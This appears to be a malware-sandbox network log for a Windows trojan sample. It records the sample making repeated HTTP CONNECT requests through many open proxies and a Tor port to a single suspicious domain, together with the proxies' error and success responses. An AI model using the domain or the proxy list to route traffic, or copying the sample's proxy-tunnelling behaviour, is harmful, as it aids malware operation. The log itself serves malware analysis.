                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                44192.168.2.85000362.112.10.2631285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.495263100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.960319042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.476016998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.507250071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.695069075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.882635117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.991883993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                45192.168.2.849997107.181.161.8141455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.497611046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                46192.168.2.8500485.161.219.1342285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.509136915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.602688074 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                47192.168.2.8499238.213.128.688895828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.511482000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.823854923 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                48192.168.2.850065104.16.105.15805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.522402048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.609642982 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                49192.168.2.850066104.20.75.69805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.525228977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.612884045 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                50192.168.2.85001092.205.105.134173175828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.534807920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.975956917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.476002932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.460530996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.491877079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.491884947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                51192.168.2.850012195.90.216.7510805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.540077925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:00.933237076 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                52192.168.2.8499398.213.128.620205828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.551145077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.864794016 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                53192.168.2.850085172.67.182.150805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.569367886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.657097101 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                54192.168.2.850101172.67.181.32805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.587198973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.675568104 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                55192.168.2.850112104.16.226.6805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.593105078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.680041075 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                56192.168.2.850135162.159.242.109805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.608099937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.695862055 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                57192.168.2.850170104.27.83.183805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.635216951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.722464085 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                58192.168.2.85007291.189.177.19031285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.653019905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.089092970 CET1286INHTTP/1.1 403 Forbidden
                                                                                Server: squid/5.7
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 3532
                                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                Vary: Accept-Language
                                                                                Content-Language: en
                                                                                X-Cache: MISS from lb1
                                                                                X-Cache-Lookup: NONE from lb1:3128
                                                                                Via: 1.1 lb1 (squid/5.7)
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                59192.168.2.850211172.67.219.60805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.661286116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.748507977 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
